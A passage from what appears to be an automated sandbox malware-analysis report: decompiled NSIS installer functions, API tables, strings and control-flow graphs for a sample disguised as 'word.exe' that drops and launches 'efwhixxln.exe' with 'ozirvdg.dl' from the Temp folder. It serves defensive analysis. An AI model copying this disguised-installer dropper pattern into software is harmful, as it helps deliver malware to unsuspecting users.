                                      0x00403d31
                                      0x00403d3c
                                      0x00403d3c
                                      0x00403d9d
                                      0x00403db0
                                      0x00403db5
                                      0x00403dc6
                                      0x00403e58
                                      0x00403e60
                                      0x00403e69
                                      0x00403e69
                                      0x00403e7f
                                      0x00403e85
                                      0x00403e93
                                      0x00403f14
                                      0x00403f1c
                                      0x00403f26
                                      0x00403f2b
                                      0x00403f31
                                      0x00403fbb
                                      0x00403fc0
                                      0x00403fc2
                                      0x00403fde
                                      0x00000000
                                      0x00403fde
                                      0x00403fc4
                                      0x00403fca
                                      0x00403fd2
                                      0x00403fd2
                                      0x00000000
                                      0x00403fca
                                      0x00403f3f
                                      0x00403f4a
                                      0x00403f4f
                                      0x00403f51
                                      0x00403f58
                                      0x00403f58
                                      0x00403f63
                                      0x00403f6b
                                      0x00403f6d
                                      0x00403f6f
                                      0x00403f78
                                      0x00403f7b
                                      0x00403f81
                                      0x00403f81
                                      0x00403fa0
                                      0x00403fb1
                                      0x00000000
                                      0x00403fb6
                                      0x00403f1e
                                      0x00403f20
                                      0x00000000
                                      0x00403e95
                                      0x00403e95
                                      0x00403ea1
                                      0x00403eab
                                      0x00403eb1
                                      0x00403eb6
                                      0x00403ec5
                                      0x00403fe3
                                      0x00403fe3
                                      0x00000000
                                      0x00403fe3
                                      0x00403ed4
                                      0x00403f0f
                                      0x00000000
                                      0x00403f0f
                                      0x00403dcc
                                      0x00403dcc
                                      0x00403dcf
                                      0x00403dd1
                                      0x00000000
                                      0x00000000
                                      0x00403ddf
                                      0x00403df1
                                      0x00403df6
                                      0x00403dff
                                      0x00000000
                                      0x00000000
                                      0x00403e05
                                      0x00403e07
                                      0x00403e14
                                      0x00403e14
                                      0x00403e1d
                                      0x00403e23
                                      0x00403e4b
                                      0x00403e53
                                      0x00000000
                                      0x00403e35
                                      0x00403e36
                                      0x00403e3f
                                      0x00403e45
                                      0x00403e46
                                      0x00000000
                                      0x00403e46
                                      0x00403e41
                                      0x00403e43
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00403e43
                                      0x00403e23

                                      APIs
                                        • Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                        • Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                      • lstrcatW.KERNEL32 ref: 00403D98
                                      • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\efwhixxln.exe" C:\Users\user\AppData\Local\Temp\ozirvdg.dl,?,?,?,"C:\Users\user\AppData\Local\Temp\efwhixxln.exe" C:\Users\user\AppData\Local\Temp\ozirvdg.dl,00000000,00435800,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,7556D4C4), ref: 00403E18
                                      • lstrcmpiW.KERNEL32(?,.exe,"C:\Users\user\AppData\Local\Temp\efwhixxln.exe" C:\Users\user\AppData\Local\Temp\ozirvdg.dl,?,?,?,"C:\Users\user\AppData\Local\Temp\efwhixxln.exe" C:\Users\user\AppData\Local\Temp\ozirvdg.dl,00000000,00435800,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403E2B
                                      • GetFileAttributesW.KERNEL32("C:\Users\user\AppData\Local\Temp\efwhixxln.exe" C:\Users\user\AppData\Local\Temp\ozirvdg.dl,?,00000000,?), ref: 00403E36
                                      • LoadImageW.USER32 ref: 00403E7F
                                        • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                      • RegisterClassW.USER32 ref: 00403EBC
                                      • SystemParametersInfoW.USER32 ref: 00403ED4
                                      • CreateWindowExW.USER32 ref: 00403F09
                                      • ShowWindow.USER32(00000005,00000000), ref: 00403F3F
                                      • GetClassInfoW.USER32 ref: 00403F6B
                                      • GetClassInfoW.USER32 ref: 00403F78
                                      • RegisterClassW.USER32 ref: 00403F81
                                      • DialogBoxParamW.USER32 ref: 00403FA0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                      • String ID: "C:\Users\user\AppData\Local\Temp\efwhixxln.exe" C:\Users\user\AppData\Local\Temp\ozirvdg.dl$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                      • API String ID: 1975747703-2978911584
                                      • Opcode ID: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                      • Instruction ID: e235badc60aeba35c86cf297cd954ec43a22164425911800af60bc979c7621a1
                                      • Opcode Fuzzy Hash: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                      • Instruction Fuzzy Hash: E661D570640201BAD730AF66AD45E2B3A7CEB84B49F40457FF945B22E1DB3D5911CA3D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 322 4030d0-40311e GetTickCount GetModuleFileNameW call 406158 325 403120-403125 322->325 326 40312a-403158 call 406668 call 405f83 call 406668 GetFileSize 322->326 327 40336a-40336e 325->327 334 403243-403251 call 40302e 326->334 335 40315e 326->335 341 403322-403327 334->341 342 403257-40325a 334->342 337 403163-40317a 335->337 339 40317c 337->339 340 40317e-403187 call 4035e2 337->340 339->340 348 40318d-403194 340->348 349 4032de-4032e6 call 40302e 340->349 341->327 344 403286-4032d2 GlobalAlloc call 406b90 call 406187 CreateFileW 342->344 345 40325c-403274 call 4035f8 call 4035e2 342->345 373 4032d4-4032d9 344->373 374 4032e8-403318 call 4035f8 call 403371 344->374 345->341 368 40327a-403280 345->368 353 403210-403214 348->353 354 403196-4031aa call 406113 348->354 349->341 358 403216-40321d call 40302e 353->358 359 40321e-403224 353->359 354->359 371 4031ac-4031b3 354->371 358->359 364 403233-40323b 359->364 365 403226-403230 call 406b22 359->365 364->337 372 403241 364->372 365->364 368->341 368->344 371->359 377 4031b5-4031bc 371->377 372->334 373->327 383 40331d-403320 374->383 377->359 379 4031be-4031c5 377->379 379->359 380 4031c7-4031ce 379->380 380->359 382 4031d0-4031f0 380->382 382->341 384 4031f6-4031fa 382->384 383->341 385 403329-40333a 383->385 386 403202-40320a 384->386 387 4031fc-403200 384->387 388 403342-403347 385->388 389 40333c 385->389 386->359 390 40320c-40320e 386->390 387->372 387->386 391 403348-40334e 388->391 389->388 390->359 391->391 392 403350-403368 call 406113 391->392 392->327
                                      C-Code - Quality: 98%
                                      			E004030D0(void* __eflags, signed int _a4) {
                                      				DWORD* _v8;
                                      				DWORD* _v12;
                                      				intOrPtr _v16;
                                      				long _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr _v28;
                                      				intOrPtr _v32;
                                      				intOrPtr _v36;
                                      				signed int _v40;
                                      				short _v560;
                                      				long _t54;
                                      				void* _t57;
                                      				void* _t62;
                                      				intOrPtr _t65;
                                      				void* _t68;
                                      				intOrPtr* _t70;
                                      				long _t82;
                                      				signed int _t89;
                                      				intOrPtr _t92;
                                      				long _t94;
                                      				void* _t102;
                                      				void* _t106;
                                      				long _t107;
                                      				long _t110;
                                      				void* _t111;
                                      
                                      				_t94 = 0;
                                      				_v8 = 0;
                                      				_v12 = 0;
                                      				 *0x42a26c = GetTickCount() + 0x3e8;
                                      				GetModuleFileNameW(0, L"C:\\Users\\Albus\\AppData\\Roaming\\word.exe", 0x400);
                                      				_t106 = E00406158(L"C:\\Users\\Albus\\AppData\\Roaming\\word.exe", 0x80000000, 3);
                                      				 *0x40a018 = _t106;
                                      				if(_t106 == 0xffffffff) {
                                      					return L"Error launching installer";
                                      				}
                                      				E00406668(0x436800, L"C:\\Users\\Albus\\AppData\\Roaming\\word.exe");
                                      				E00406668(0x439000, E00405F83(0x436800));
                                      				_t54 = GetFileSize(_t106, 0);
                                      				 *0x420f00 = _t54;
                                      				_t110 = _t54;
                                      				if(_t54 <= 0) {
                                      					L24:
                                      					E0040302E(1);
                                      					if( *0x42a274 == _t94) {
                                      						goto L32;
                                      					}
                                      					if(_v12 == _t94) {
                                      						L28:
                                      						_t57 = GlobalAlloc(0x40, _v20); // executed
                                      						_t111 = _t57;
                                      						E00406B90(0x40ce68);
                                      						E00406187(0x40ce68,  &_v560, L"C:\\Users\\Albus\\AppData\\Local\\Temp\\"); // executed
                                      						_t62 = CreateFileW( &_v560, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
                                      						 *0x40a01c = _t62;
                                      						if(_t62 != 0xffffffff) {
                                      							_t65 = E004035F8( *0x42a274 + 0x1c);
                                      							 *0x420f04 = _t65;
                                      							 *0x420ef8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                                      							_t68 = E00403371(_v16, 0xffffffff, _t94, _t111, _v20); // executed
                                      							if(_t68 == _v20) {
                                      								 *0x42a270 = _t111;
                                      								 *0x42a278 =  *_t111;
                                      								if((_v40 & 0x00000001) != 0) {
                                      									 *0x42a27c =  *0x42a27c + 1;
                                      								}
                                      								_t45 = _t111 + 0x44; // 0x44
                                      								_t70 = _t45;
                                      								_t102 = 8;
                                      								do {
                                      									_t70 = _t70 - 8;
                                      									 *_t70 =  *_t70 + _t111;
                                      									_t102 = _t102 - 1;
                                      								} while (_t102 != 0);
                                      								 *((intOrPtr*)(_t111 + 0x3c)) =  *0x420ef4;
                                      								E00406113(0x42a280, _t111 + 4, 0x40);
                                      								return 0;
                                      							}
                                      							goto L32;
                                      						}
                                      						return L"Error writing temporary file. Make sure your temp folder is valid.";
                                      					}
                                      					E004035F8( *0x420ef0);
                                      					if(E004035E2( &_a4, 4) == 0 || _v8 != _a4) {
                                      						goto L32;
                                      					} else {
                                      						goto L28;
                                      					}
                                      				} else {
                                      					do {
                                      						_t107 = _t110;
                                      						asm("sbb eax, eax");
                                      						_t82 = ( ~( *0x42a274) & 0x00007e00) + 0x200;
                                      						if(_t110 >= _t82) {
                                      							_t107 = _t82;
                                      						}
                                      						if(E004035E2(0x418ef0, _t107) == 0) {
                                      							E0040302E(1);
                                      							L32:
                                      							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                      						}
                                      						if( *0x42a274 != 0) {
                                      							if((_a4 & 0x00000002) == 0) {
                                      								E0040302E(0);
                                      							}
                                      							goto L20;
                                      						}
                                      						E00406113( &_v40, 0x418ef0, 0x1c);
                                      						_t89 = _v40;
                                      						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
                                      							_a4 = _a4 | _t89;
                                      							 *0x42a300 =  *0x42a300 | _a4 & 0x00000002;
                                      							_t92 = _v16;
                                      							 *0x42a274 =  *0x420ef0;
                                      							if(_t92 > _t110) {
                                      								goto L32;
                                      							}
                                      							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                                      								_v12 = _v12 + 1;
                                      								_t110 = _t92 - 4;
                                      								if(_t107 > _t110) {
                                      									_t107 = _t110;
                                      								}
                                      								goto L20;
                                      							} else {
                                      								break;
                                      							}
                                      						}
                                      						L20:
                                      						if(_t110 <  *0x420f00) {
                                      							_v8 = E00406B22(_v8, 0x418ef0, _t107);
                                      						}
                                      						 *0x420ef0 =  *0x420ef0 + _t107;
                                      						_t110 = _t110 - _t107;
                                      					} while (_t110 != 0);
                                      					_t94 = 0;
                                      					goto L24;
                                      				}
                                      			}




























                                      0x004030db
                                      0x004030de
                                      0x004030e1
                                      0x004030fb
                                      0x00403100
                                      0x00403113
                                      0x00403118
                                      0x0040311e
                                      0x00000000
                                      0x00403120
                                      0x00403131
                                      0x00403142
                                      0x00403149
                                      0x00403151
                                      0x00403156
                                      0x00403158
                                      0x00403243
                                      0x00403245
                                      0x00403251
                                      0x00000000
                                      0x00000000
                                      0x0040325a
                                      0x00403286
                                      0x0040328b
                                      0x00403296
                                      0x00403298
                                      0x004032a9
                                      0x004032c4
                                      0x004032cd
                                      0x004032d2
                                      0x004032f1
                                      0x00403301
                                      0x00403313
                                      0x00403318
                                      0x00403320
                                      0x0040332d
                                      0x00403335
                                      0x0040333a
                                      0x0040333c
                                      0x0040333c
                                      0x00403344
                                      0x00403344
                                      0x00403347
                                      0x00403348
                                      0x00403348
                                      0x0040334b
                                      0x0040334d
                                      0x0040334d
                                      0x00403357
                                      0x00403363
                                      0x00000000
                                      0x00403368
                                      0x00000000
                                      0x00403320
                                      0x00000000
                                      0x004032d4
                                      0x00403262
                                      0x00403274
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040315e
                                      0x00403163
                                      0x00403168
                                      0x0040316c
                                      0x00403173
                                      0x0040317a
                                      0x0040317c
                                      0x0040317c
                                      0x00403187
                                      0x004032e0
                                      0x00403322
                                      0x00000000
                                      0x00403322
                                      0x00403194
                                      0x00403214
                                      0x00403218
                                      0x0040321d
                                      0x00000000
                                      0x00403214
                                      0x0040319d
                                      0x004031a2
                                      0x004031aa
                                      0x004031d0
                                      0x004031df
                                      0x004031e5
                                      0x004031ea
                                      0x004031f0
                                      0x00000000
                                      0x00000000
                                      0x004031fa
                                      0x00403202
                                      0x00403205
                                      0x0040320a
                                      0x0040320c
                                      0x0040320c
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004031fa
                                      0x0040321e
                                      0x00403224
                                      0x00403230
                                      0x00403230
                                      0x00403233
                                      0x00403239
                                      0x00403239
                                      0x00403241
                                      0x00000000
                                      0x00403241

                                      APIs
                                      • GetTickCount.KERNEL32(7556D4C4,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004030E4
                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\word.exe,00000400), ref: 00403100
                                        • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\AppData\Roaming\word.exe,80000000,00000003), ref: 0040615C
                                        • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                      • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,C:\Users\user\AppData\Roaming\word.exe,C:\Users\user\AppData\Roaming\word.exe,80000000,00000003), ref: 00403149
                                      • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\word.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                      • API String ID: 2803837635-565166287
                                      • Opcode ID: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                      • Instruction ID: 6a7077609e6cbe8902eef3654a796be60faa9129f620d49927b75729aeb44cd1
                                      • Opcode Fuzzy Hash: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                      • Instruction Fuzzy Hash: 74710271A40204ABDB20DFB5DD85B9E3AACAB04315F21457FF901B72D2CB789E418B6D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 459 40176f-401794 call 402da6 call 405fae 464 401796-40179c call 406668 459->464 465 40179e-4017b0 call 406668 call 405f37 lstrcatW 459->465 470 4017b5-4017b6 call 4068ef 464->470 465->470 474 4017bb-4017bf 470->474 475 4017c1-4017cb call 40699e 474->475 476 4017f2-4017f5 474->476 483 4017dd-4017ef 475->483 484 4017cd-4017db CompareFileTime 475->484 477 4017f7-4017f8 call 406133 476->477 478 4017fd-401819 call 406158 476->478 477->478 486 40181b-40181e 478->486 487 40188d-4018b6 call 4056ca call 403371 478->487 483->476 484->483 488 401820-40185e call 406668 * 2 call 4066a5 call 406668 call 405cc8 486->488 489 40186f-401879 call 4056ca 486->489 499 4018b8-4018bc 487->499 500 4018be-4018ca SetFileTime 487->500 488->474 521 401864-401865 488->521 501 401882-401888 489->501 499->500 503 4018d0-4018db CloseHandle 499->503 500->503 504 402c33 501->504 506 4018e1-4018e4 503->506 507 402c2a-402c2d 503->507 508 402c35-402c39 504->508 511 4018e6-4018f7 call 4066a5 lstrcatW 506->511 512 4018f9-4018fc call 4066a5 506->512 507->504 518 401901-4023a2 call 405cc8 511->518 512->518 518->507 518->508 521->501 523 401867-401868 521->523 523->489
                                      C-Code - Quality: 77%
                                      			E0040176F(FILETIME* __ebx, void* __eflags) {
                                      				void* __esi;
                                      				void* _t35;
                                      				void* _t43;
                                      				void* _t45;
                                      				FILETIME* _t51;
                                      				FILETIME* _t64;
                                      				void* _t66;
                                      				signed int _t72;
                                      				FILETIME* _t73;
                                      				FILETIME* _t77;
                                      				signed int _t79;
                                      				WCHAR* _t81;
                                      				void* _t83;
                                      				void* _t84;
                                      				void* _t86;
                                      
                                      				_t77 = __ebx;
                                      				 *(_t86 - 8) = E00402DA6(0x31);
                                      				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
                                      				_t35 = E00405FAE( *(_t86 - 8));
                                      				_push( *(_t86 - 8));
                                      				_t81 = L"\"C:\\";
                                      				if(_t35 == 0) {
                                      					lstrcatW(E00405F37(E00406668(_t81, 0x436000)), ??);
                                      				} else {
                                      					E00406668();
                                      				}
                                      				E004068EF(_t81);
                                      				while(1) {
                                      					__eflags =  *(_t86 + 8) - 3;
                                      					if( *(_t86 + 8) >= 3) {
                                      						_t66 = E0040699E(_t81);
                                      						_t79 = 0;
                                      						__eflags = _t66 - _t77;
                                      						if(_t66 != _t77) {
                                      							_t73 = _t66 + 0x14;
                                      							__eflags = _t73;
                                      							_t79 = CompareFileTime(_t73, _t86 - 0x24);
                                      						}
                                      						asm("sbb eax, eax");
                                      						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                      						__eflags = _t72;
                                      						 *(_t86 + 8) = _t72;
                                      					}
                                      					__eflags =  *(_t86 + 8) - _t77;
                                      					if( *(_t86 + 8) == _t77) {
                                      						E00406133(_t81);
                                      					}
                                      					__eflags =  *(_t86 + 8) - 1;
                                      					_t43 = E00406158(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                                      					__eflags = _t43 - 0xffffffff;
                                      					 *(_t86 - 0x38) = _t43;
                                      					if(_t43 != 0xffffffff) {
                                      						break;
                                      					}
                                      					__eflags =  *(_t86 + 8) - _t77;
                                      					if( *(_t86 + 8) != _t77) {
                                      						E004056CA(0xffffffe2,  *(_t86 - 8));
                                      						__eflags =  *(_t86 + 8) - 2;
                                      						if(__eflags == 0) {
                                      							 *((intOrPtr*)(_t86 - 4)) = 1;
                                      						}
                                      						L31:
                                      						 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t86 - 4));
                                      						__eflags =  *0x42a2e8;
                                      						goto L32;
                                      					} else {
                                      						E00406668(0x40b5f8, _t83);
                                      						E00406668(_t83, _t81);
                                      						E004066A5(_t77, _t81, _t83, "C:\Users\Albus\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
                                      						E00406668(_t83, 0x40b5f8);
                                      						_t64 = E00405CC8("C:\Users\Albus\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
                                      						__eflags = _t64;
                                      						if(_t64 == 0) {
                                      							continue;
                                      						} else {
                                      							__eflags = _t64 == 1;
                                      							if(_t64 == 1) {
                                      								 *0x42a2e8 =  &( *0x42a2e8->dwLowDateTime);
                                      								L32:
                                      								_t51 = 0;
                                      								__eflags = 0;
                                      							} else {
                                      								_push(_t81);
                                      								_push(0xfffffffa);
                                      								E004056CA();
                                      								L29:
                                      								_t51 = 0x7fffffff;
                                      							}
                                      						}
                                      					}
                                      					L33:
                                      					return _t51;
                                      				}
                                      				E004056CA(0xffffffea,  *(_t86 - 8));
                                      				 *0x42a314 =  *0x42a314 + 1;
                                      				_t45 = E00403371(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
                                      				 *0x42a314 =  *0x42a314 - 1;
                                      				__eflags =  *(_t86 - 0x24) - 0xffffffff;
                                      				_t84 = _t45;
                                      				if( *(_t86 - 0x24) != 0xffffffff) {
                                      					L22:
                                      					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
                                      				} else {
                                      					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
                                      					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
                                      						goto L22;
                                      					}
                                      				}
                                      				CloseHandle( *(_t86 - 0x38)); // executed
                                      				__eflags = _t84 - _t77;
                                      				if(_t84 >= _t77) {
                                      					goto L31;
                                      				} else {
                                      					__eflags = _t84 - 0xfffffffe;
                                      					if(_t84 != 0xfffffffe) {
                                      						E004066A5(_t77, _t81, _t84, _t81, 0xffffffee);
                                      					} else {
                                      						E004066A5(_t77, _t81, _t84, _t81, 0xffffffe9);
                                      						lstrcatW(_t81,  *(_t86 - 8));
                                      					}
                                      					_push(0x200010);
                                      					_push(_t81);
                                      					E00405CC8();
                                      					goto L29;
                                      				}
                                      				goto L33;
                                      			}


















                                      0x0040176f
                                      0x00401776
                                      0x00401782
                                      0x00401785
                                      0x0040178a
                                      0x0040178d
                                      0x00401794
                                      0x004017b0
                                      0x00401796
                                      0x00401797
                                      0x00401797
                                      0x004017b6
                                      0x004017bb
                                      0x004017bb
                                      0x004017bf
                                      0x004017c2
                                      0x004017c7
                                      0x004017c9
                                      0x004017cb
                                      0x004017d0
                                      0x004017d0
                                      0x004017db
                                      0x004017db
                                      0x004017ec
                                      0x004017ee
                                      0x004017ee
                                      0x004017ef
                                      0x004017ef
                                      0x004017f2
                                      0x004017f5
                                      0x004017f8
                                      0x004017f8
                                      0x004017ff
                                      0x0040180e
                                      0x00401813
                                      0x00401816
                                      0x00401819
                                      0x00000000
                                      0x00000000
                                      0x0040181b
                                      0x0040181e
                                      0x00401874
                                      0x00401879
                                      0x004015b6
                                      0x0040292e
                                      0x0040292e
                                      0x00402c2a
                                      0x00402c2d
                                      0x00402c2d
                                      0x00000000
                                      0x00401820
                                      0x00401826
                                      0x0040182d
                                      0x0040183a
                                      0x00401845
                                      0x0040185b
                                      0x0040185b
                                      0x0040185e
                                      0x00000000
                                      0x00401864
                                      0x00401864
                                      0x00401865
                                      0x00401882
                                      0x00402c33
                                      0x00402c33
                                      0x00402c33
                                      0x00401867
                                      0x00401867
                                      0x00401868
                                      0x00401493
                                      0x0040239d
                                      0x0040239d
                                      0x0040239d
                                      0x00401865
                                      0x0040185e
                                      0x00402c35
                                      0x00402c39
                                      0x00402c39
                                      0x00401892
                                      0x00401897
                                      0x004018a5
                                      0x004018aa
                                      0x004018b0
                                      0x004018b4
                                      0x004018b6
                                      0x004018be
                                      0x004018ca
                                      0x004018b8
                                      0x004018b8
                                      0x004018bc
                                      0x00000000
                                      0x00000000
                                      0x004018bc
                                      0x004018d3
                                      0x004018d9
                                      0x004018db
                                      0x00000000
                                      0x004018e1
                                      0x004018e1
                                      0x004018e4
                                      0x004018fc
                                      0x004018e6
                                      0x004018e9
                                      0x004018f2
                                      0x004018f2
                                      0x00401901
                                      0x00401906
                                      0x00402398
                                      0x00000000
                                      0x00402398
                                      0x00000000

                                      APIs
                                      • lstrcatW.KERNEL32 ref: 004017B0
                                      • CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\AppData\Local\Temp\efwhixxln.exe" C:\Users\user\AppData\Local\Temp\ozirvdg.dl,"C:\Users\user\AppData\Local\Temp\efwhixxln.exe" C:\Users\user\AppData\Local\Temp\ozirvdg.dl,00000000,00000000,"C:\Users\user\AppData\Local\Temp\efwhixxln.exe" C:\Users\user\AppData\Local\Temp\ozirvdg.dl,00436000,?,?,00000031), ref: 004017D5
                                        • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                        • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                        • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                        • Part of subcall function 004056CA: lstrcatW.KERNEL32 ref: 00405725
                                        • Part of subcall function 004056CA: SetWindowTextW.USER32 ref: 00405737
                                        • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                        • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                        • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                      • String ID: "C:\Users\user\AppData\Local\Temp\efwhixxln.exe" C:\Users\user\AppData\Local\Temp\ozirvdg.dl$C:\Users\user\AppData\Local\Temp
                                      • API String ID: 1941528284-122764760
                                      • Opcode ID: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                                      • Instruction ID: 87dd38174d63fc88252c3cacf76d35d2aef1a13c6195c1d88e2760da23471212
                                      • Opcode Fuzzy Hash: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                                      • Instruction Fuzzy Hash: DE41B771500205BACF10BBB5CD85DAE7A75EF45328B20473FF422B21E1D63D89619A2E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 525 4069c5-4069e5 GetSystemDirectoryW 526 4069e7 525->526 527 4069e9-4069eb 525->527 526->527 528 4069fc-4069fe 527->528 529 4069ed-4069f6 527->529 531 4069ff-406a32 wsprintfW LoadLibraryExW 528->531 529->528 530 4069f8-4069fa 529->530 530->531
                                      C-Code - Quality: 100%
                                      			E004069C5(intOrPtr _a4) {
                                      				short _v576;
                                      				signed int _t13;
                                      				struct HINSTANCE__* _t17;
